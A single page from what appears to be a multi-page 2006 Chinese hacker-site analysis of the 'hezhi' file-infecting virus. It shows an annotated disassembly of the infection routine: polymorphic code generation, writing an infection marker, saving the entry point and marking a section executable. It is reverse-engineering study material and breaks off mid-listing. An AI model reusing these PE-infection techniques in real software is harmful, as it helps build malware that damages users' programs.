 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| hezhi病毒分析报告 | |||||
作者:未知 文章来源:黑客动画吧 点击数: 更新时间:2006-3-18  |
|||||
|
00412B11 3C 05 CMP AL,5 00412B13 74 04 JE SHORT CLSPACK.00412B19 00412B15 FEC3 INC BL 00412B17 EB 05 JMP SHORT CLSPACK.00412B1E 00412B19 80E2 03 AND DL,3 00412B1C 8ADA MOV BL,DL 00412B1E 83E0 07 AND EAX,7 00412B21 83E3 07 AND EBX,7 00412B24 83E1 07 AND ECX,7 00412B27 E8 6C050000 CALL CLSPACK.00413098 \\这个CALL根椐上面产生的随机数产生随机代码,(里面包含一张表) 00412B2C 5A POP EDX 00412B2D 59 POP ECX 00412B2E 5B POP EBX 00412B2F 58 POP EAX 00412B30 81E3 FF0F0000 AND EBX,0FFF 00412B36 899F 7F100000 MOV DWORD PTR DS:[EDI+107F],EBX 00412B3C B9 46310000 MOV ECX,3146 00412B41 2BCB SUB ECX,EBX 00412B43 898F 85100000 MOV DWORD PTR DS:[EDI+1085],ECX 00412B49 59 POP ECX 00412B4A 5B POP EBX 00412B4B 8987 8F100000 MOV DWORD PTR DS:[EDI+108F],EAX 00412B51 66:C746 09 54C3 MOV WORD PTR DS:[ESI+9],0C354 \\写入感染标志,这个位置为PE文件的TimeDateStamp处 00412B57 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28] \\原AddressOfEntryPoint 00412B5A 8987 5F060000 MOV DWORD PTR DS:[EDI+65F],EAX \\呵呵,在解密后的病毒+65F处可以看见 可爱的入口地址 00412B60 8B46 38 MOV EAX,DWORD PTR DS:[ESI+38] \\SectionAlignment 00412B63 8987 942E0000 MOV DWORD PTR DS:[EDI+2E94],EAX 00412B69 8B46 34 MOV EAX,DWORD PTR DS:[ESI+34] \\ImageBase 00412B6C 8987 B2300000 MOV DWORD PTR DS:[EDI+30B2],EAX 00412B72 8D5E 18 LEA EBX,DWORD PTR DS:[ESI+18] \\Magic 00412B75 33D2 XOR EDX,EDX 00412B77 66:8B56 14 MOV DX,WORD PTR DS:[ESI+14] \\SizeOfOptionHeader 00412B7B 03DA ADD EBX,EDX \\EBX->第一个节表 00412B7D 33C9 XOR ECX,ECX 00412B7F 66:8B4E 06 MOV CX,WORD PTR DS:[ESI+6] \\NumberOfSections 00412B83 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28] \\AddressofEntryPoint 00412B86 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C] \\VirtualAddress 00412B89 3BC2 CMP EAX,EDX 00412B8B 72 07 JB SHORT CLSPACK.00412B94 \\如果AddressOfEntryPoint00412B8D 0353 08 ADD EDX,DWORD PTR DS:[EBX+8] \\VirtualSize 00412B90 3BC2 CMP EAX,EDX 00412B92 76 18 JBE SHORT CLSPACK.00412BAC \\如果入口点在当前节中则跳 00412B94 83C3 28 ADD EBX,28 00412B97 ^E2 EA LOOPD SHORT CLSPACK.00412B83 00412B99 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1 00412BA0 74 05 JE SHORT CLSPACK.00412BA7 00412BA2 E9 43030000 JMP CLSPACK.00412EEA 00412BA7 E9 F5190000 JMP CLSPACK.004145A1 00412BAC 50 PUSH EAX 00412BAD 52 PUSH EDX 00412BAE 05 00020000 ADD EAX,200 00412BB3 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C] \\VirtualAddress 00412BB6 0353 10 ADD EDX,DWORD PTR DS:[EBX+10] \\SizeOfRawData 00412BB9 3BC2 CMP EAX,EDX 00412BBB 5A POP EDX 00412BBC 58 POP EAX 00412BBD 77 24 JA SHORT CLSPACK.00412BE3 00412BBF 50 PUSH EAX 00412BC0 0346 34 ADD EAX,DWORD PTR DS:[ESI+34] \\ImageBase 00412BC3 8987 18060000 MOV DWORD PTR DS:[EDI+618],EAX \\ImageBase+AddressOfEntryPoint 00412BC9 8B43 24 MOV EAX,DWORD PTR DS:[EBX+24] \\Characteristics 00412BCC 0D 00000020 OR EAX,20000000 \\IMAGE_SCN_MEM_EXECUTE 00412BD1 8943 24 MOV DWORD PTR DS:[EBX+24],EAX \\写回 00412BD4 58 POP EAX \\AddressOfEntryPoint 00412BD5 2B43 0C SUB EAX,DWORD PTR DS:[EBX+C] \\EAX-VirtualAddress 00412BD8 0343 14 ADD EAX,DWORD PTR DS:[EBX+14] \\PointerToRawData 00412BDB 8987 A22E0000 MOV DWORD PTR DS:[EDI+2EA2],EAX \\EAX->FileOffset 00412BE1 EB 2F JMP SHORT CLSPACK.00412C12 00412BE3 50 PUSH EAX 00412BE4 & 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 下一页 |
|||||
| 文章录入:IceRiver 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
